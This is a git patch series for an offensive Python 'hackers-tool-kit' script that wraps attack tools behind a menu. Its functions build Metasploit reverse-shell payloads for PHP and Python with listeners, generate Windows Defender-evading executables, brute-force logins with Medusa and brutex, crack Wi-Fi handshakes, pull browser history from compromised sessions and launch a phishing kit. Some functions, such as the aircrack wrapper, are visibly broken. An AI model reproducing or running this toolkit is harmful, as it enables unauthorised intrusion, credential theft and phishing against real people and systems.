hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#FOXHIS START# +#------------# +def foxhis(): + os.system('echo "sessions\n" >> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 9fb83a29286a5438d6decc2b661065f4adc1c7c0 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 31 May 2019 00:52:24 +0100 Subject: [PATCH 166/214] Update htksecure.py --- htksecure.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/htksecure.py b/htksecure.py index eeac98f..b54e690 100644 --- a/htksecure.py +++ b/htksecure.py @@ -10,7 +10,7 @@ print "\033[92mWould you like to continue? y or n\033[0m" h = raw_input("?: ") if h == "n": - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" sys.exit() if h == "y": print "\033[93m------------------------\033[0m" From d2e85ce073886d59a770480bd54772b871524a6a Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 31 May 2019 01:25:03 +0100 Subject: [PATCH 167/214] Delete htk.py --- htk.py | 3151 -------------------------------------------------------- 1 file changed, 3151 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index b9df752..0000000 --- a/htk.py +++ /dev/null @@ -1,3151 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ 